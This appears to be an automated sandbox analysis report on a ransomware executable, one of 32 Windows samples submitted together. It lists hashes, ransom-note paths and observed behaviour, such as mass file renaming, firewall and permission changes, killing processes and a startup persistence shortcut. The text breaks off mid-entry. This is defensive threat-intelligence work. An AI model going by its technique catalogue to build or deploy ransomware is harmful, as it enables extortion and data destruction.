Overview
overview
10Static
static
100778d2ae60...93.exe
windows10-2004-x64
102005110ee8...24.exe
windows10-2004-x64
10290072a9e1...51.exe
windows10-2004-x64
103998d0e987...7f.exe
windows10-2004-x64
10435844f4e1...2b.exe
windows10-2004-x64
3495fbfecbc...72.exe
windows10-2004-x64
1542c157186...88.exe
windows10-2004-x64
10561d7f0505...35.exe
windows10-2004-x64
10617364875d...bb.exe
windows10-2004-x64
36312ac9176...d8.exe
windows10-2004-x64
1063545fa195...8a.exe
windows10-2004-x64
106555038a04...42.exe
windows10-2004-x64
10677393ff5e...59.exe
windows10-2004-x64
1680caf0e30...75.exe
windows10-2004-x64
1070192d461c...8b.exe
windows10-2004-x64
376199c2662...6d.exe
windows10-2004-x64
38727091cbb...44.exe
windows10-2004-x64
1091450f9e8a...dc.exe
windows10-2004-x64
1093386ea79c...b9.exe
windows10-2004-x64
6942bc9e43e...7c.exe
windows10-2004-x64
10ac7a29cb82...b8.exe
windows10-2004-x64
10baa851154b...1f.exe
windows10-2004-x64
10bb5ca9d8de...69.exe
windows10-2004-x64
10c15e2ffa84...07.exe
windows10-2004-x64
10c743ba0861...26.exe
windows10-2004-x64
cfda742c2d...e5.exe
windows10-2004-x64
10d1d74ec103...34.exe
windows10-2004-x64
1d765e722e2...b9.exe
windows10-2004-x64
10daa41f5230...de.exe
windows10-2004-x64
9ed12ea76d0...0a.exe
windows10-2004-x64
10f062577b68...e0.exe
windows10-2004-x64
10f244a04265...35.exe
windows10-2004-x64
10Resubmissions
13-07-2024 09:54
240713-lxcvgawdmn 1013-07-2024 09:52
240713-lv46yawdkj 1013-07-2024 09:46
240713-lrz3tayajc 10Analysis
-
max time kernel
139s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
13-07-2024 09:46
Behavioral task
behavioral1
Sample
0778d2ae6074545731b471360877b58c89ba0aaca6a0ffdb25694340c910cc93.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
2005110ee806a4fb40e00fe6c76af3527e3d66cd828723ee39529942812b8924.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
290072a9e1cf3872487cf586a592be534abc894d20ffd1121fe8338f1b52b451.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
3998d0e987accc2837c6bf87fdb2796d0170ae2a79383b78fd778531410e337f.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
435844f4e1a57fbfa40edf039ac0b29fab6c4115adbaba2ff2907c921a6aac2b.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral6
Sample
495fbfecbcadb103389cc33828db139fa6d66bece479c7f70279834051412d72.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
542c157186bae766dd3e2df424e9c25251d71086b99cc9df121bc9bf50462688.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral8
Sample
561d7f05055800d3eb9d9e150969e2c84a71dc82a362fb3e1a224af420e53b35.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
617364875d331ab132bac1e63fb9b5a00ac5a33a22b93749dd6ee384ed435dbb.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral10
Sample
6312ac91761037de7a7afc7323671a004db71b31a69499178437bdf939fa9dd8.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
63545fa195488ff51955f09833332b9660d18f8afb16bdf579134661962e548a.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral12
Sample
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral13
Sample
677393ff5efc9f6f050b4b5ed62579f2f050eeec53e7a17cb51c31c148546f59.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral14
Sample
680caf0e30b204544971d053b635ed0e3f1dee3332d9eab8a08b3f04cd7ecd75.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
70192d461c98da3d6d9734663dfee8d121b2739e9868f28b1fa67794ba3c9a8b.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral16
Sample
76199c26622c58fa0a22355d710ef06d86e3cce56def3d9a3c38ea395e48066d.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
8727091cbb89e5e31eeb2503ffaa242601c8840eee0973fd62fedf1b4b58ab44.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral18
Sample
91450f9e8aeb0361867cdefc0bb7e5bad8941b5081db549d34a91072df4db5dc.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
93386ea79c58a95c033e66da99d155264f0028a43973a9a4496f3fc8c89db0b9.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral20
Sample
942bc9e43e40e01694365aced2331634257727783353c7d49d940abcc215a17c.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
ac7a29cb82b7b3e50d8aaa0da5e431f0b466de07dad241e5b6090cf71963e3b8.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral22
Sample
baa851154b7492b20ea71c068f77e7e2b91d347fb97e5e05999af153e3fd0f1f.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral23
Sample
bb5ca9d8de51734dbd14dc081c7c892d819cd14fafd7ccd62849d70f9e679369.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral24
Sample
c15e2ffa84d30fa17e9c61c19cde98b22ac6e259ec16b68a9927bed13a0aec07.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
c743ba08610d442531bb897a35748ba6fe897e730cea6e29377ba21141901326.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral26
Sample
cfda742c2de7706171af64a89806656a107069e1677aa4ce0583e696f954fde5.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
d1d74ec1039ff5aab99faf99bf70fb07f6b4c763a0c2fbc08b702ec9dcb03834.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral28
Sample
d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
daa41f52309815eff99483c87788bfb56b8576f15eaad42cd5b06bb3cf0cccde.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral30
Sample
ed12ea76d03b8255f361975cebd5c579491dacc60c52e03373e7bf509523820a.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
f062577b6879fb42fbf7fef1c2a21f96d4d372f1424c1c77f255d13fb60bfae0.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral32
Sample
f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
Resource
win10v2004-20240709-en
General
-
Target
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe
-
Size
97KB
-
MD5
b5de1cca5ec8047847717b01c268509a
-
SHA1
c463d7aa1e69a591ef75db3f0e4b08dcc2901c1e
-
SHA256
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42
-
SHA512
a28cc345e4cbff344ec0aef7cdfe231ae9b1ac3f99a5dae6d9aa3f807fe3da9cf64b826bf1b72f3a697a13089d8370d42dbd60ea79e1a0469508647185dd80c9
-
SSDEEP
3072:YrnY2lU8KdD5/Ut6VToG9o+8DtRzpytcpRf9EI4Ixe:/fNdO7f9T4Ix
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Signatures
-
Renames multiple (236) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 312 netsh.exe 232 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Drops startup file 1 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 13636 icacls.exe 13620 icacls.exe 13604 icacls.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 icanhazip.com -
Drops file in Program Files directory 34 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exedescription ioc process File opened for modification C:\Program Files\BlockFormat.ini.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ExportTest.lock.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\InvokeStart.cab.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ReadMerge.ico.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\RenameConvert.MTS.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\RestoreAdd.vstx.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ResumeMerge.M2T.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ConvertToSuspend.xps.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\DenyWait.pptx.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\PingImport.wmf.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\UnprotectEnter.vb.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\BackupSubmit.ocx.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ExpandEnable.aif.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\InstallPing.ram.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\PushCompare.AAC.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\UpdateDebug.mp3.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\OpenClose.rm.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\TestDeny.vstx.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\LockSearch.mp2.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\RevokePop.tmp.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\SendRestore.csv.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\TraceWrite.bat.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\WriteRegister.dot.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\DisconnectRestore.ram.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\EnterMove.mpeg2.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\EnterShow.cmd.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\MountResize.doc.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\TestExpand.i64.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\UnblockCopy.wdp.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\AssertTest.mov.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ConvertToReset.bin.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\ShowUninstall.raw.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\SkipWrite.3gp.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Program Files\SyncExport.reg.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Drops file in Windows directory 11 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exedescription ioc process File opened for modification C:\Windows\SysmonDrv.sys.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\system.ini.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\win.ini.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\WindowsShell.Manifest 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\Professional.xml.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\lsasetup.log.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\PFRO.log.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\setupact.log.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\WindowsUpdate.log.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File created C:\Windows\RESTORE_FILES_INFO.txt 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe File opened for modification C:\Windows\DtcInstall.log.auto 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5024 sc.exe 216 sc.exe 3400 sc.exe 4404 sc.exe 2112 sc.exe 2728 sc.exe 2312 sc.exe 3412 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 10428 taskkill.exe 11148 taskkill.exe 11064 taskkill.exe 1748 taskkill.exe 12948 taskkill.exe 12928 taskkill.exe 872 taskkill.exe 5132 taskkill.exe 11140 taskkill.exe 11108 taskkill.exe 11024 taskkill.exe 11016 taskkill.exe 12956 taskkill.exe 12304 taskkill.exe 7468 taskkill.exe 11544 taskkill.exe 13364 taskkill.exe 12920 taskkill.exe 11172 taskkill.exe 11156 taskkill.exe 10888 taskkill.exe 10880 taskkill.exe 12968 taskkill.exe 12940 taskkill.exe 11536 taskkill.exe 11180 taskkill.exe 11132 taskkill.exe 11100 taskkill.exe 11072 taskkill.exe 11552 taskkill.exe 11528 taskkill.exe 10868 taskkill.exe 11048 taskkill.exe 11124 taskkill.exe 11092 taskkill.exe 11080 taskkill.exe 11052 taskkill.exe 11036 taskkill.exe 10952 taskkill.exe 10920 taskkill.exe 12296 taskkill.exe 11204 taskkill.exe 11568 taskkill.exe 11560 taskkill.exe 11188 taskkill.exe 10944 taskkill.exe 10936 taskkill.exe 10904 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exepid process 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Token: SeDebugPrivilege 1748 taskkill.exe Token: SeDebugPrivilege 11124 taskkill.exe Token: SeDebugPrivilege 11204 taskkill.exe Token: SeDebugPrivilege 10944 taskkill.exe Token: SeDebugPrivilege 10936 taskkill.exe Token: SeDebugPrivilege 11140 taskkill.exe Token: SeDebugPrivilege 10880 taskkill.exe Token: SeDebugPrivilege 10888 taskkill.exe Token: SeDebugPrivilege 12920 taskkill.exe Token: SeDebugPrivilege 11080 taskkill.exe Token: SeDebugPrivilege 10904 taskkill.exe Token: SeDebugPrivilege 11072 taskkill.exe Token: SeDebugPrivilege 11064 taskkill.exe Token: SeDebugPrivilege 10952 taskkill.exe Token: SeDebugPrivilege 12948 taskkill.exe Token: SeDebugPrivilege 12940 taskkill.exe Token: SeDebugPrivilege 11052 taskkill.exe Token: SeDebugPrivilege 11148 taskkill.exe Token: SeDebugPrivilege 11180 taskkill.exe Token: SeDebugPrivilege 11536 taskkill.exe Token: SeDebugPrivilege 11172 taskkill.exe Token: SeDebugPrivilege 10920 taskkill.exe Token: SeDebugPrivilege 12956 taskkill.exe Token: SeDebugPrivilege 12928 taskkill.exe Token: SeDebugPrivilege 12968 taskkill.exe Token: SeDebugPrivilege 11092 taskkill.exe Token: SeDebugPrivilege 12304 taskkill.exe Token: SeDebugPrivilege 13364 taskkill.exe Token: SeDebugPrivilege 11108 taskkill.exe Token: SeDebugPrivilege 11016 taskkill.exe Token: SeDebugPrivilege 11036 taskkill.exe Token: SeDebugPrivilege 11528 taskkill.exe Token: SeDebugPrivilege 11100 taskkill.exe Token: SeDebugPrivilege 11544 taskkill.exe Token: SeDebugPrivilege 11188 taskkill.exe Token: SeDebugPrivilege 11568 taskkill.exe Token: SeDebugPrivilege 10428 taskkill.exe Token: SeDebugPrivilege 11024 taskkill.exe Token: SeDebugPrivilege 11048 taskkill.exe Token: SeDebugPrivilege 7468 taskkill.exe Token: SeDebugPrivilege 11156 taskkill.exe Token: SeDebugPrivilege 10868 taskkill.exe Token: SeDebugPrivilege 11552 taskkill.exe Token: SeDebugPrivilege 12296 taskkill.exe Token: SeDebugPrivilege 13508 powershell.exe Token: SeDebugPrivilege 11560 taskkill.exe Token: SeDebugPrivilege 5132 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exepid process 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exepid process 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exedescription pid process target process PID 572 wrote to memory of 1748 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe taskkill.exe PID 572 wrote to memory of 1748 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe taskkill.exe PID 572 wrote to memory of 1748 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe taskkill.exe PID 572 wrote to memory of 4636 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe reg.exe PID 572 wrote to memory of 4636 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe reg.exe PID 572 wrote to memory of 4636 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe reg.exe PID 572 wrote to memory of 1176 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe reg.exe PID 572 wrote to memory of 1176 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe reg.exe PID 572 wrote to memory of 1176 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe reg.exe PID 572 wrote to memory of 4936 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe schtasks.exe PID 572 wrote to memory of 4936 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe schtasks.exe PID 572 wrote to memory of 4936 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe schtasks.exe PID 572 wrote to memory of 2740 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe cmd.exe PID 572 wrote to memory of 2740 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe cmd.exe PID 572 wrote to memory of 2740 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe cmd.exe PID 572 wrote to memory of 4756 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe cmd.exe PID 572 wrote to memory of 4756 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe cmd.exe PID 572 wrote to memory of 4756 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe cmd.exe PID 572 wrote to memory of 312 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe netsh.exe PID 572 wrote to memory of 312 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe netsh.exe PID 572 wrote to memory of 312 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe netsh.exe PID 572 wrote to memory of 232 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe netsh.exe PID 572 wrote to memory of 232 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe netsh.exe PID 572 wrote to memory of 232 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe netsh.exe PID 572 wrote to memory 